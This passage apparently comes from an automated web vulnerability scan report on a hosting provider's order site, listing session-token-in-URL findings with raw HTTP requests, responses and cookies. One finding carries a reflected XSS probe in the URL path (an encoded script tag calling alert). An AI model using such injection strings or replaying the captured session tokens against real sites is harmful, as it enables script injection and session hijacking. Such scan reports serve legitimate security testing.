<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=MsHosting&amp;page=switch&amp;linkOrigin=MsHosting&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.server" rel="button-hd-nav-server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.tab.linuxhosting" rel="button-hd-tab-linuxhosting"><span>
...[SNIP]...
<h2 class="nolink"><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">Hosting</a>
...[SNIP]...
<li class="first-item"><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Domaininfo;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">All About Domains</a>
...[SNIP]...
<li class="first-level"><a class="core_button_normal" href="/xml/order/Service;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">Service &amp; Support</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/FirstWebsite;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">First Website</a>
...[SNIP]...
<li><a rel="height=480, width=665" class="window-open core_button_normal" href="/xml/order/Moneyback;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
90-Day Guarantee
</a>
...[SNIP]...
<li class="two-rows"><a class="core_button_normal" href="/xml/order/International;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">International Customers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/News;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">News</a>
...[SNIP]...
</h4><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;origin.page=MsHosting&amp;linkId=weiter&amp;site=PU.NGH.US&amp;page=switch&amp;sourcearea=on"><img src="/oneandone_en_common/img/frontend-hosting/teaser/teaser_ngh.png" alt="" class="alphapng" title="1&amp;1 MyBusiness Site" width="112" height="70">
...[SNIP]...
</p><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;origin.page=MsHosting&amp;linkId=weiter&amp;site=PU.NGH.US&amp;page=switch&amp;sourcearea=on">


Details
</a>
...[SNIP]...
<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;cart.action=add-bundle&amp;cart.bundle=tariff-ms-beginner-package-bundle&amp;packageselection=MsHosting"><span>
...[SNIP]...
<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;cart.action=add-bundle&amp;cart.bundle=tariff-ms-home-package-bundle&amp;packageselection=MsHosting"><span>
...[SNIP]...
<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;packageselection=MsHosting&amp;cart.action=add-bundle&amp;cart.bundle=tariff-ms-business-package-bundle"><span>
...[SNIP]...
<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;packageselection=MsHosting&amp;cart.action=add-bundle&amp;cart.bundle=tariff-ms-developer-package-bundle"><span>
...[SNIP]...
<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;cart.action=add-bundle&amp;cart.bundle=tariff-ms-beginner-package-bundle&amp;packageselection=MsHosting"><span>
...[SNIP]...
<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;cart.action=add-bundle&amp;cart.bundle=tariff-ms-home-package-bundle&amp;packageselection=MsHosting"><span>
...[SNIP]...
<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;packageselection=MsHosting&amp;cart.action=add-bundle&amp;cart.bundle=tariff-ms-business-package-bundle"><span>
...[SNIP]...
<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;packageselection=MsHosting&amp;cart.action=add-bundle&amp;cart.bundle=tariff-ms-developer-package-bundle"><span>
...[SNIP]...
<td class="feature-banner" colspan="5"><a class="core_button_normal" onclick="return !window.open(this.href,'_blank','toolbar=no,location=no,status=yes,menubar=no,scrollbars=yes,resizable=yes,width=665,height=590,screenX=100,screenY=100');" href="/xml/order/FeatureDreamweaver;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static"><img src="/common/img/components/hosting/vis_softwarebundle.png" alt="Adobe Dreamweaver" class="software alphapng" width="98" height="66">
...[SNIP]...
<td class="feature-banner-link" colspan="5"><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">New Features for Linux packages</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDomainDomains;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
Included Domains
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDomainPdr;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
Private Domain Registration
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDomainDns;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
DNS Management
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureControlCenter;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
1&amp;1 Control Panel
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDatabaseDatabase;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
1&amp;1 WebDatabase
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDatabaseAccess;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
Access Database Supported
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDatabaseMssql;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
MS SQL Database
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureEmailEmail;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
E-mail Accounts
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureEmailWebmail;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
1&amp;1 WebMail 2.0
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureEmailVirusscan;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
Spam Filter
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingWsb;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
1&amp;1 WebsiteBuilder
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDreamweaver;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">Adobe&reg; Dreamweaver&reg; CS4</a>
...[SNIP]...
</span><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDreamweaver;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">optional</a>
...[SNIP]...
</span><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDreamweaver;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">optional</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDreamweaver;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">NetObjects Fusion&reg; 1&amp;1 Edition</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingAsp;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
Active Server Pages (ASP)
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingNet;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
ASP.net 3.5/.NET Framework
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingDsc;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
DynamicSiteCreator
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingPhotogallery;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
1&amp;1 Photo Gallery
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureCommunicationToolsMerchandise;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
Spreadshirt Merchandising
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureWebdesignIstock;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
iStockphoto image library
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingElements;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
1&amp;1 FormBuilder
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingContentmoduls;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
1&amp;1 Dynamic Content Catalog
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingMap;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
Maps
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingDriving;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
Directions
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingCgi;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
Ready-to-Run CGI Library
</a>
...[SNIP]...
</span><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureToolsRatepoint;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
RatePoint
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureMarketingCtrGoogleAdWords;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
Google&#8482; AdWords**
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureMarketingCtrCitysearch;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
Citysearch&reg;
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureMarketingCtrSesub;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
Simple Submission
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureMarketingCtrStat;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
1&amp;1 WebStatistics
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingMailinglist;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
Mailing List
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureCommunicationToolsNewsletter;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
1&amp;1 E-mail Marketing Tool
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingRss;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
Easy RSS
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureCommunicationToolsChat;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
Chat Channels
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureCommunicationToolsDialogue;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
In2site Live Dialogue
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSecurityCertificate;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
GeoTrust Dedicated SSL Certificate
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureGuaranteeMoneyback;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
90-Day Money Back Guarantee
</a>
...[SNIP]...
<br><a class="core_button_normal" href="/xml/order/TcSpecialOffers;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">Click here</a>
...[SNIP]...
<p>** See <a rel="height=350, width=665" class="window-open" href="/xml/order/popupTcGoogleAdwords;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">T&amp;C</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=MsHosting&amp;linkOrigin=MsHosting&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=MsHosting&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...

3.85. http://order.1and1.com/xml/order/MsHosting

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/MsHosting

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/MsHosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.mail HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=; emos1und1d1_jcsid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k22HCyrc0S5Ck_gLCqZigiV2:1300632671085; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1300632671085:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 14:55:42 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=kcmc3OjsxWlpaVGddZCpiXCkbJXVoYjpRRD4mKicnJiQmJCEhJCMdICQXMC8uK1A+al9hbycpJFQtV2YsHyAcGyAzMTQyLDQrKjNrbDIlLl5nLSAhHRwhHTI1My01LCs=; Expires=Fri, 07-Apr-2079 18:09:49 GMT; Path=/
ETag: b67acb7c15edd14e68367a76bb0bfc39
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 59574


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.86. http://order.1and1.com/xml/order/MsHosting9d4af%3C/ScRiPt%20%3E%3CScRiPt%3Ealert(String.fromCharCode(88,83,83))%3C/ScRiPt%3E542f10c1a1e

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/MsHosting9d4af%3C/ScRiPt%20%3E%3CScRiPt%3Ealert(String.fromCharCode(88,83,83))%3C/ScRiPt%3E542f10c1a1e

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/MsHosting9d4af%3C/ScRiPt%20%3E%3CScRiPt%3Ealert(String.fromCharCode(88,83,83))%3C/ScRiPt%3E542f10c1a1e;jsessionid=8AC1FFB321E88045E58D20D05D6B2648.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.mail HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://burp/show/16
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=Sal8vMjMpUlJSTF9sczlxazgqNG1gWjJJPDYeIh8fHhweHDAwMzIsLzMmKCcmI0g2YldZZx8hHEwlZnU7Li8rKi8rKSwqJCwjIitjZCoeJlZ2PC8wLCswLSosJiYkJig=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:5:AAABLtRV*lKZz6xm29DD7n8Tbz9KytaA:1300642527826; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; __PFIX_TST_=5b6bb06549f8a000

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 17:36:09 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1439

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<title>1&amp;1 Internet AG - Page or Document not found</title>
<meta h
...[SNIP]...

3.87. http://order.1and1.com/xml/order/News

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/News

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /xml/order/News;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:38:15 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=AZVoqLS4kZGRkXnFnbjRsZjMlL2hbVS1ENzEZHRoxMC4wLisrLi0nKi4hIyIhHkMxXVJUYjEzLl43YXA2KSomJSomJCclHyceHSZedjwxOGhxNyorJyYrKCUoIyYnICE=; Expires=Fri, 07-Apr-2079 21:52:22 GMT; Path=/
ETag: edde5942d29d19678a705797aa76065e
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 28632


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=News&amp;linkOrigin=News&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.home" rel="button-hd-nav-home">Home</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
